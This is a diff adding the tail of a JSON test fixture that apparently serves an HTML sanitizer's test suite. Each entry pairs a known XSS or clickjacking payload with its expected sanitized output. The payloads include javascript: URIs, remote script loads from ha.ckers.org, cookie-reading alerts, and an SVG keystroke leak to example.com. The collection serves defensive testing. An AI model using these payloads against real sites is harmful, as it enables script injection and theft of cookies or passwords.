1.472 + "data": "<a href=\"http://attacker.org\">\n\t<iframe src=\"http://example.org/\"></iframe>\n</a>",
1.473 + "sanitized": "<html><head></head><body><a href=\"http://attacker.org\">\n\t\n</a></body></html>"
1.474 + },
1.475 + {
1.476 + "data": "<div draggable=\"true\" ondragstart=\"event.dataTransfer.setData('text/plain','malicious code');\">\n\t<h1>Drop me</h1>\n</div>\n\n<iframe src=\"http://www.example.org/dropHere.html\"></iframe>",
1.477 + "sanitized": "<html><head></head><body><div draggable=\"true\">\n\t<h1>Drop me</h1>\n</div>\n\n</body></html>"
1.478 + },
1.479 + {
1.480 + "data": "<iframe src=\"view-source:http://www.example.org/\" frameborder=\"0\" style=\"width:400px;height:180px\"></iframe>\n\n<textarea type=\"text\" cols=\"50\" rows=\"10\"></textarea>",
1.481 + "sanitized": "<html><head></head><body>\n\n<textarea type=\"text\" cols=\"50\" rows=\"10\"></textarea></body></html>"
1.482 + },
1.483 + {
1.484 + "data": "<script>\nfunction makePopups(){\n\tfor (i=1;i<6;i++) {\n\t\twindow.open('popup.html','spam'+i,'width=50,height=50');\n\t}\n}\n</script>\n\n<body>\n<a href=\"#\" onclick=\"makePopups()\">Spam</a>",
1.485 + "sanitized": "<html><head>\n\n</head><body>\n<a>Spam</a></body></html>"
1.486 + },
1.487 + {
1.488 + "data": "<html xmlns=\"http://www.w3.org/1999/xhtml\"\nxmlns:svg=\"http://www.w3.org/2000/svg\">\n<body style=\"background:gray\">\n<iframe src=\"http://example.com/\" style=\"width:800px; height:350px; border:none; mask: url(#maskForClickjacking);\"/>\n<svg:svg>\n<svg:mask id=\"maskForClickjacking\" maskUnits=\"objectBoundingBox\" maskContentUnits=\"objectBoundingBox\">\n\t<svg:rect x=\"0.0\" y=\"0.0\" width=\"0.373\" height=\"0.3\" fill=\"white\"/>\n\t<svg:circle cx=\"0.45\" cy=\"0.7\" r=\"0.075\" fill=\"white\"/>\n</svg:mask>\n</svg:svg>\n</body>\n</html>",
1.489 + "sanitized": "<html><head></head><body>\n\n<svg:svg>\n<svg:mask id=\"maskForClickjacking\" maskUnits=\"objectBoundingBox\" maskContentUnits=\"objectBoundingBox\">\n\t<svg:rect x=\"0.0\" y=\"0.0\" width=\"0.373\" height=\"0.3\" fill=\"white\"/>\n\t<svg:circle cx=\"0.45\" cy=\"0.7\" r=\"0.075\" fill=\"white\"/>\n</svg:mask>\n</svg:svg>\n</body>\n</html></body></html>"
1.490 + },
1.491 + {
1.492 + "data": "<iframe sandbox=\"allow-same-origin allow-forms allow-scripts\" src=\"http://example.org/\"></iframe>",
1.493 + "sanitized": "<html><head></head><body></body></html>"
1.494 + },
1.495 + {
1.496 + "data": "<span class=foo>Some text</span>\n<a class=bar href=\"http://www.example.org\">www.example.org</a>\n\n<script src=\"http://code.jquery.com/jquery-1.4.4.js\"></script>\n<script>\n$(\"span.foo\").click(function() {\nalert('foo');\n$(\"a.bar\").click();\n});\n$(\"a.bar\").click(function() {\nalert('bar');\nlocation=\"http://html5sec.org\";\n});\n</script>",
1.497 + "sanitized": "<html><head></head><body><span class=\"foo\">Some text</span>\n<a class=\"bar\" href=\"http://www.example.org\">www.example.org</a>\n\n\n</body></html>"
1.498 + },
1.499 + {
1.500 + "data": "<script src=\"/\\example.com\\foo.js\"></script> // Safari 5.0, Chrome 9, 10\n<script src=\"\\\\example.com\\foo.js\"></script> // Safari 5.0",
1.501 + "sanitized": "<html><head> </head><body>// Safari 5.0, Chrome 9, 10\n // Safari 5.0</body></html>"
1.502 + },
1.503 + {
1.504 + "data": "<?xml version=\"1.0\"?>\r\n<?xml-stylesheet type=\"text/xml\" href=\"#stylesheet\"?>\r\n<!DOCTYPE doc [\r\n<!ATTLIST xsl:stylesheet\r\n id ID #REQUIRED>]>\r\n<svg xmlns=\"http://www.w3.org/2000/svg\">\r\n <xsl:stylesheet id=\"stylesheet\" version=\"1.0\" xmlns:xsl=\"http://www.w3.org/1999/XSL/Transform\">\r\n <xsl:template match=\"/\">\r\n <iframe xmlns=\"http://www.w3.org/1999/xhtml\" src=\"javascript:alert(1)\"></iframe>\r\n </xsl:template>\r\n </xsl:stylesheet>\r\n <circle fill=\"red\" r=\"40\"></circle>\r\n</svg>",
1.505 + "sanitized": "<!DOCTYPE doc>\n<html><head></head><body>]>\n\n \n \n \n \n \n \n</body></html>"
1.506 + },
1.507 + {
1.508 + "data": "<object id=\"x\" classid=\"clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598\"></object>\r\n<object classid=\"clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B\" onqt_error=\"alert(1)\" style=\"behavior:url(#x);\"><param name=postdomevents /></object>",
1.509 + "sanitized": "<html><head></head><body>\n</body></html>"
1.510 + },
1.511 + {
1.512 + "data": "<svg xmlns=\"http://www.w3.org/2000/svg\" id=\"x\">\r\n<listener event=\"load\" handler=\"#y\" xmlns=\"http://www.w3.org/2001/xml-events\" observer=\"x\"/>\r\n<handler id=\"y\">alert(1)</handler>\r\n</svg>",
1.513 + "sanitized": "<html><head></head><body>\n\nalert(1)\n</body></html>"
1.514 + },
1.515 + {
1.516 + "data": "<svg><style><img/src=x onerror=alert(1)// </b>",
1.517 + "sanitized": "<html><head></head><body></body></html>"
1.518 + },
1.519 + {
1.520 + "data": "<svg>\n<image style='filter:url(\"data:image/svg+xml,<svg xmlns=%22http://www.w3.org/2000/svg%22><script>parent.alert(1)</script></svg>\")'>\n<!--\nSame effect with\n<image filter='...'>\n-->\n</svg>",
1.521 + "sanitized": "<html><head></head><body>\n\n\n</body></html>"
1.522 + },
1.523 + {
1.524 + "data": "<math href=\"javascript:alert(1)\">CLICKME</math>\r\n\r\n<math>\r\n<!-- up to FF 13 -->\r\n<maction actiontype=\"statusline#http://google.com\" xlink:href=\"javascript:alert(2)\">CLICKME</maction>\r\n\r\n<!-- FF 14+ -->\r\n<maction actiontype=\"statusline\" xlink:href=\"javascript:alert(3)\">CLICKME<mtext>http://http://google.com</mtext></maction>\r\n</math>",
1.525 + "sanitized": "<html><head></head><body><math>CLICKME</math>\n\n<math>\n\n<maction actiontype=\"statusline#http://google.com\">CLICKME</maction>\n\n\n<maction actiontype=\"statusline\">CLICKME<mtext>http://http://google.com</mtext></maction>\n</math></body></html>"
1.526 + },
1.527 + {
1.528 + "data": "<b>drag and drop one of the following strings to the drop box:</b>\r\n<br/><hr/>\r\njAvascript:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);//\r\n<br/><hr/>\r\nfeed:javascript:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);//\r\n<br/><hr/>\r\nfeed:data:text/html,<script>alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie)</script><b>\r\n<br/><hr/>\r\nfeed:feed:javAscript:javAscript:feed:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);//\r\n<br/><hr/>\r\n<div id=\"dropbox\" style=\"height: 360px;width: 500px;border: 5px solid #000;position: relative;\" ondragover=\"event.preventDefault()\">+ Drop Box +</div>",
1.529 + "sanitized": "<html><head></head><body><b>drag and drop one of the following strings to the drop box:</b>\n<br><hr>\njAvascript:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);//\n<br><hr>\nfeed:javascript:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);//\n<br><hr>\nfeed:data:text/html,<script>alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie)</script><b>\n<br><hr>\nfeed:feed:javAscript:javAscript:feed:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);//\n<br><hr>\n<div id=\"dropbox\">+ Drop Box +</div></body></html>"
1.530 + },
1.531 + {
1.532 + "data": "<!doctype html>\r\n<form>\r\n<label>type a,b,c,d - watch the network tab/traffic (JS is off, latest NoScript)</label>\r\n<br>\r\n<input name=\"secret\" type=\"password\">\r\n</form>\r\n<!-- injection --><svg height=\"50px\">\r\n<image xmlns:xlink=\"http://www.w3.org/1999/xlink\">\r\n<set attributeName=\"xlink:href\" begin=\"accessKey(a)\" to=\"//example.com/?a\" />\r\n<set attributeName=\"xlink:href\" begin=\"accessKey(b)\" to=\"//example.com/?b\" />\r\n<set attributeName=\"xlink:href\" begin=\"accessKey(c)\" to=\"//example.com/?c\" />\r\n<set attributeName=\"xlink:href\" begin=\"accessKey(d)\" to=\"//example.com/?d\" />\r\n</image>\r\n</svg>",
1.533 + "sanitized": "<!DOCTYPE html>\n<html><head></head><body>\n<label>type a,b,c,d - watch the network tab/traffic (JS is off, latest NoScript)</label>\n<br>\n\n\n\n\n\n\n\n\n\n</body></html>"
1.534 + },
1.535 + {
1.536 + "data": "<!-- `<img/src=xx:xx onerror=alert(1)//--!>",
1.537 + "sanitized": "<html><head></head><body></body></html>"
1.538 + },
1.539 + {
1.540 + "data": "<xmp>\r\n<%\r\n</xmp>\r\n<img alt='%></xmp><img src=xx:x onerror=alert(1)//'>\r\n\r\n<script>\r\nx='<%'\r\n</script> %>/\r\nalert(2)\r\n</script>\r\n\r\nXXX\r\n<style>\r\n*['<!--']{}\r\n</style>\r\n-->{}\r\n*{color:red}</style>",
1.541 + "sanitized": "<html><head></head><body>\n<%\n\n<img alt=\"%></xmp><img src=xx:x onerror=alert(1)//\">\n\n %>/\nalert(2)\n\n\nXXX\n\n-->{}\n*{color:red}</body></html>"
1.542 + },
1.543 + {
1.544 + "data": "<?xml-stylesheet type=\"text/xsl\" href=\"#\" ?>\r\n<stylesheet xmlns=\"http://www.w3.org/TR/WD-xsl\">\r\n<template match=\"/\">\r\n<eval>new ActiveXObject('htmlfile').parentWindow.alert(1)</eval>\r\n<if expr=\"new ActiveXObject('htmlfile').parentWindow.alert(2)\"></if>\r\n</template>\r\n</stylesheet>",
1.545 + "sanitized": "<html><head></head><body>\n\n</body></html>"
1.546 + },
1.547 + {
1.548 + "data": "<form action=\"\" method=\"post\">\r\n<input name=\"username\" value=\"admin\" />\r\n<input name=\"password\" type=\"password\" value=\"secret\" />\r\n<input name=\"injected\" value=\"injected\" dirname=\"password\" />\r\n<input type=\"submit\">\r\n</form>",
1.549 + "sanitized": "<html><head></head><body>\n\n\n\n\n</body></html>"
1.550 + },
1.551 + {
1.552 + "data": "<SCRIPT>alert('XSS');</SCRIPT>",
1.553 + "sanitized": "<html><head></head><body></body></html>"
1.554 + },
1.555 + {
1.556 + "data": "'';!--\"<XSS>=&{()}",
1.557 + "sanitized": "<html><head></head><body>'';!--\"=&{()}</body></html>"
1.558 + },
1.559 + {
1.560 + "data": "<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>",
1.561 + "sanitized": "<html><head></head><body></body></html>"
1.562 + },
1.563 + {
1.564 + "data": "<IMG SRC=\"javascript:alert('XSS');\">",
1.565 + "sanitized": "<html><head></head><body><img></body></html>"
1.566 + },
1.567 + {
1.568 + "data": "<IMG SRC=javascript:alert('XSS')>",
1.569 + "sanitized": "<html><head></head><body><img></body></html>"
1.570 + },
1.571 + {
1.572 + "data": "<IMG SRC=JaVaScRiPt:alert('XSS')>",
1.573 + "sanitized": "<html><head></head><body><img></body></html>"
1.574 + },
1.575 + {
1.576 + "data": "<IMG SRC=javascript:alert("XSS")>",
1.577 + "sanitized": "<html><head></head><body><img></body></html>"
1.578 + },
1.579 + {
1.580 + "data": "<IMG SRC=`javascript:alert(\"RSnake says, 'XSS'\")`>",
1.581 + "sanitized": "<html><head></head><body><img></body></html>"
1.582 + },
1.583 + {
1.584 + "data": "<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>",
1.585 + "sanitized": "<html><head></head><body><img></body></html>"
1.586 + },
1.587 + {
1.588 + "data": "SRC=
<IMG 6;avascript:alert('XSS')>",
1.589 + "sanitized": "<html><head></head><body>SRC=\n<img></body></html>"
1.590 + },
1.591 + {
1.592 + "data": "<IMG SRC=javascript:alert('XSS')>",
1.593 + "sanitized": "<html><head></head><body><img></body></html>"
1.594 + },
1.595 + {
1.596 + "data": "<IMG SRC=javascript:alert('XSS')>",
1.597 + "sanitized": "<html><head></head><body><img></body></html>"
1.598 + },
1.599 + {
1.600 + "data": "<IMG SRC=\"javascript:alert('XSS');\">",
1.601 + "sanitized": "<html><head></head><body><img></body></html>"
1.602 + },
1.603 + {
1.604 + "data": "<IMG SRC=\"jav	ascript:alert('XSS');\">",
1.605 + "sanitized": "<html><head></head><body><img></body></html>"
1.606 + },
1.607 + {
1.608 + "data": "<IMG SRC=\"jav
ascript:alert('XSS');\">",
1.609 + "sanitized": "<html><head></head><body><img></body></html>"
1.610 + },
1.611 + {
1.612 + "data": "<IMG SRC=\"jav
ascript:alert('XSS');\">",
1.613 + "sanitized": "<html><head></head><body><img></body></html>"
1.614 + },
1.615 + {
1.616 + "data": "<IMG SRC=\"  javascript:alert('XSS');\">",
1.617 + "sanitized": "<html><head></head><body><img></body></html>"
1.618 + },
1.619 + {
1.620 + "data": "<SCRIPT/XSS SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>",
1.621 + "sanitized": "<html><head></head><body></body></html>"
1.622 + },
1.623 + {
1.624 + "data": "<SCRIPT SRC=http://ha.ckers.org/xss.js?<B>",
1.625 + "sanitized": "<html><head></head><body></body></html>"
1.626 + },
1.627 + {
1.628 + "data": "<IMG SRC=\"javascript:alert('XSS')\"",
1.629 + "sanitized": "<html><head></head><body></body></html>"
1.630 + },
1.631 + {
1.632 + "data": "<SCRIPT>a=/XSS/",
1.633 + "sanitized": "<html><head></head><body></body></html>"
1.634 + },
1.635 + {
1.636 + "data": "\\\";alert('XSS');//",
1.637 + "sanitized": "<html><head></head><body>\\\";alert('XSS');//</body></html>"
1.638 + },
1.639 + {
1.640 + "data": "<INPUT TYPE=\"IMAGE\" SRC=\"javascript:alert('XSS');\">",
1.641 + "sanitized": "<html><head></head><body></body></html>"
1.642 + },
1.643 + {
1.644 + "data": "<BODY BACKGROUND=\"javascript:alert('XSS')\">",
1.645 + "sanitized": "<html><head></head><body></body></html>"
1.646 + },
1.647 + {
1.648 + "data": "<BODY ONLOAD=alert('XSS')>",
1.649 + "sanitized": "<html><head></head><body></body></html>"
1.650 + },
1.651 + {
1.652 + "data": "<IMG DYNSRC=\"javascript:alert('XSS')\">",
1.653 + "sanitized": "<html><head></head><body><img></body></html>"
1.654 + },
1.655 + {
1.656 + "data": "<IMG LOWSRC=\"javascript:alert('XSS')\">",
1.657 + "sanitized": "<html><head></head><body><img></body></html>"
1.658 + },
1.659 + {
1.660 + "data": "<BGSOUND SRC=\"javascript:alert('XSS');\">",
1.661 + "sanitized": "<html><head></head><body></body></html>"
1.662 + },
1.663 + {
1.664 + "data": "<BR SIZE=\"&{alert('XSS')}\">",
1.665 + "sanitized": "<html><head></head><body><br></body></html>"
1.666 + },
1.667 + {
1.668 + "data": "<LAYER SRC=\"http://ha.ckers.org/scriptlet.html\"></LAYER>",
1.669 + "sanitized": "<html><head></head><body></body></html>"
1.670 + },
1.671 + {
1.672 + "data": "<LINK REL=\"stylesheet\" HREF=\"javascript:alert('XSS');\">",
1.673 + "sanitized": "<html><head></head><body></body></html>"
1.674 + },
1.675 + {
1.676 + "data": "<LINK REL=\"stylesheet\" HREF=\"http://ha.ckers.org/xss.css\">",
1.677 + "sanitized": "<html><head></head><body></body></html>"
1.678 + },
1.679 + {
1.680 + "data": "<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>",
1.681 + "sanitized": "<html><head></head><body></body></html>"
1.682 + },
1.683 + {
1.684 + "data": "<META HTTP-EQUIV=\"Link\" Content=\"<http://ha.ckers.org/xss.css>; REL=stylesheet\">",
1.685 + "sanitized": "<html><head></head><body></body></html>"
1.686 + },
1.687 + {
1.688 + "data": "<STYLE>BODY{-moz-binding:url(\"http://ha.ckers.org/xssmoz.xml#xss\")}</STYLE>",
1.689 + "sanitized": "<html><head></head><body></body></html>"
1.690 + },
1.691 + {
1.692 + "data": "<IMG SRC='vbscript:msgbox(\"XSS\")'>",
1.693 + "sanitized": "<html><head></head><body><img></body></html>"
1.694 + },
1.695 + {
1.696 + "data": "<IMG SRC=\"mocha:[code]\">",
1.697 + "sanitized": "<html><head></head><body><img></body></html>"
1.698 + },
1.699 + {
1.700 + "data": "<IMG SRC=\"livescript:[code]\">",
1.701 + "sanitized": "<html><head></head><body><img></body></html>"
1.702 + },
1.703 + {
1.704 + "data": "<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('XSS');\">",
1.705 + "sanitized": "<html><head></head><body></body></html>"
1.706 + },
1.707 + {
1.708 + "data": "<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\">",
1.709 + "sanitized": "<html><head></head><body></body></html>"
1.710 + },
1.711 + {
1.712 + "data": "<META HTTP-EQUIV=\"Link\" Content=\"<javascript:alert('XSS')>; REL=stylesheet\">",
1.713 + "sanitized": "<html><head></head><body></body></html>"
1.714 + },
1.715 + {
1.716 + "data": "<META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:alert('XSS');\">",
1.717 + "sanitized": "<html><head></head><body></body></html>"
1.718 + },
1.719 + {
1.720 + "data": "<IFRAME SRC=\"javascript:alert('XSS');\"></IFRAME>",
1.721 + "sanitized": "<html><head></head><body></body></html>"
1.722 + },
1.723 + {
1.724 + "data": "<FRAMESET><FRAME SRC=\"javascript:alert('XSS');\"></FRAMESET>",
1.725 + "sanitized": "<html><head></head></html>"
1.726 + },
1.727 + {
1.728 + "data": "<TABLE BACKGROUND=\"javascript:alert('XSS')\">",
1.729 + "sanitized": "<html><head></head><body><table></table></body></html>"
1.730 + },
1.731 + {
1.732 + "data": "<DIV STYLE=\"background-image: url(javascript:alert('XSS'))\">",
1.733 + "sanitized": "<html><head></head><body><div></div></body></html>"
1.734 + },
1.735 + {
1.736 + "data": "<DIV STYLE=\"background-image: url(javascript:alert('XSS'))\">",
1.737 + "sanitized": "<html><head></head><body><div></div></body></html>"
1.738 + },
1.739 + {
1.740 + "data": "<DIV STYLE=\"width: expression(alert('XSS'));\">",
1.741 + "sanitized": "<html><head></head><body><div></div></body></html>"
1.742 + },
1.743 + {
1.744 + "data": "<STYLE>@im\\port'\\ja\\vasc\\ript:alert(\"XSS\")';</STYLE>",
1.745 + "sanitized": "<html><head></head><body></body></html>"
1.746 + },
1.747 + {
1.748 + "data": "<IMG STYLE=\"xss:expr/*XSS*/ession(alert('XSS'))\">",
1.749 + "sanitized": "<html><head></head><body><img></body></html>"
1.750 + },
1.751 + {
1.752 + "data": "<XSS STYLE=\"xss:expression(alert('XSS'))\">",
1.753 + "sanitized": "<html><head></head><body></body></html>"
1.754 + },
1.755 + {
1.756 + "data": "exp/*<XSS STYLE='no\\xss:noxss(\"*//*\");",
1.757 + "sanitized": "<html><head></head><body>exp/*</body></html>"
1.758 + },
1.759 + {
1.760 + "data": "<STYLE TYPE=\"text/javascript\">alert('XSS');</STYLE>",
1.761 + "sanitized": "<html><head></head><body></body></html>"
1.762 + },
1.763 + {
1.764 + "data": "<STYLE>.XSS{background-image:url(\"javascript:alert('XSS')\");}</STYLE><A CLASS=XSS></A>",
1.765 + "sanitized": "<html><head></head><body><a class=\"XSS\"></a></body></html>"
1.766 + },
1.767 + {
1.768 + "data": "<STYLE type=\"text/css\">BODY{background:url(\"javascript:alert('XSS')\")}</STYLE>",
1.769 + "sanitized": "<html><head></head><body></body></html>"
1.770 + },
1.771 + {
1.772 + "data": "<BASE HREF=\"javascript:alert('XSS');//\">",
1.773 + "sanitized": "<html><head></head><body></body></html>"
1.774 + },
1.775 + {
1.776 + "data": "<OBJECT TYPE=\"text/x-scriptlet\" DATA=\"http://ha.ckers.org/scriptlet.html\"></OBJECT>",
1.777 + "sanitized": "<html><head></head><body></body></html>"
1.778 + },
1.779 + {
1.780 + "data": "<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT>",
1.781 + "sanitized": "<html><head></head><body></body></html>"
1.782 + },
1.783 + {
1.784 + "data": "getURL(\"javascript:alert('XSS')\")",
1.785 + "sanitized": "<html><head></head><body>getURL(\"javascript:alert('XSS')\")</body></html>"
1.786 + },
1.787 + {
1.788 + "data": "a=\"get\";",
1.789 + "sanitized": "<html><head></head><body>a=\"get\";</body></html>"
1.790 + },
1.791 + {
1.792 + "data": "<!--<value><![CDATA[<XML ID=I><X><C><![CDATA[<IMG SRC=\"javas<![CDATA[cript:alert('XSS');\">",
1.793 + "sanitized": "<html><head></head><body></body></html>"
1.794 + },
1.795 + {
1.796 + "data": "<XML SRC=\"http://ha.ckers.org/xsstest.xml\" ID=I></XML>",
1.797 + "sanitized": "<html><head></head><body></body></html>"
1.798 + },
1.799 + {
1.800 + "data": "<HTML><BODY>",
1.801 + "sanitized": "<html><head></head><body></body></html>"
1.802 + },
1.803 + {
1.804 + "data": "<SCRIPT SRC=\"http://ha.ckers.org/xss.jpg\"></SCRIPT>",
1.805 + "sanitized": "<html><head></head><body></body></html>"
1.806 + },
1.807 + {
1.808 + "data": "<!--#exec cmd=\"/bin/echo '<SCRIPT SRC'\"--><!--#exec cmd=\"/bin/echo '=http://ha.ckers.org/xss.js></SCRIPT>'\"-->",
1.809 + "sanitized": "<html><head></head><body></body></html>"
1.810 + },
1.811 + {
1.812 + "data": "<? echo('<SCR)';",
1.813 + "sanitized": "<html><head></head><body></body></html>"
1.814 + },
1.815 + {
1.816 + "data": "<META HTTP-EQUIV=\"Set-Cookie\" Content=\"USERID=<SCRIPT>alert('XSS')</SCRIPT>\">",
1.817 + "sanitized": "<html><head></head><body></body></html>"
1.818 + },
1.819 + {
1.820 + "data": "<HEAD><META HTTP-EQUIV=\"CONTENT-TYPE\" CONTENT=\"text/html; charset=UTF-7\"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-",
1.821 + "sanitized": "<html><head> </head><body>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-</body></html>"
1.822 + },
1.823 + {
1.824 + "data": "<SCRIPT a=\">\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>",
1.825 + "sanitized": "<html><head></head><body></body></html>"
1.826 + },
1.827 + {
1.828 + "data": "<SCRIPT a=\">\" '' SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>",
1.829 + "sanitized": "<html><head></head><body></body></html>"
1.830 + },
1.831 + {
1.832 + "data": "<SCRIPT \"a='>'\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>",
1.833 + "sanitized": "<html><head></head><body></body></html>"
1.834 + },
1.835 + {
1.836 + "data": "<SCRIPT a=`>` SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>",
1.837 + "sanitized": "<html><head></head><body></body></html>"
1.838 + },
1.839 + {
1.840 + "data": "<SCRIPT>document.write(\"<SCRI\");</SCRIPT>PT SRC",
1.841 + "sanitized": "<html><head></head><body>PT SRC</body></html>"
1.842 + },
1.843 + {
1.844 + "data": "",
1.845 + "sanitized": "<html><head></head><body></body></html>"
1.846 + }
1.847 +]
